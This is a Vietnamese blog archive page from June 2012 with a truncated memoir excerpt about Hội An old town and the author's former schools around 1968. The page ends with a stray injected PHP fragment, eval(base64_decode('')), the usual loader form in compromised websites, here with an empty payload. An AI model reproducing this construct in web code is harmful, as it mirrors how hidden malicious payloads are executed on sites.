Archive for June 30th, 2012

Phố cổ Hội An và những ngôi trường cũ

Phố cổ Hội An và những ngôi trường cũ

Tôi đến trung học Trần Quý Cáp bắt đầu với hành trình ở chùa Viên Giác. Tôi nhớ rất rõ, ngày cuối mùa hè ở trường Nguyễn Duy Hiệu năm 1968, nơi trường Duy Xuyên mượn chỗ để dạy cho các học sinh Duy Xuyên vừa tản cư ra sau trận M

06.30.2012 | Ký-Truyện-Tùy Bút |

7 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>